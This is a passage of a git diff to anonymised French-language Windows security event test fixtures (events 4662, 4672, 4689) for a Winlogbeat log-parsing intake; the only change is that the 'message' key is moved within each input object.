-    "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}"
+    }
   },
   "expected": {
     "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}",
diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json
index 59c3d35b3..ec935a02c 100644
--- a/Beats/winlogbeat/tests/security_event_4672.json
+++ b/Beats/winlogbeat/tests/security_event_4672.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}"
+    }
   },
   "expected": {
     "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}",
diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json
index e5beffcf5..22840d53c 100644
--- a/Beats/winlogbeat/tests/security_event_4689.json
+++ b/Beats/winlogbeat/tests/security_event_4689.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}"
+    }
   },
   "expected": {
     "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}",
diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json
index 96e08b538..03a0543f5 100644
--- a/Beats/winlogbeat/tests/security_event_4720.json
+++ b/Beats/winlogbeat/tests/security_event_4720.json
@@ -1,12 +1,12 @@
 {
   "input": {
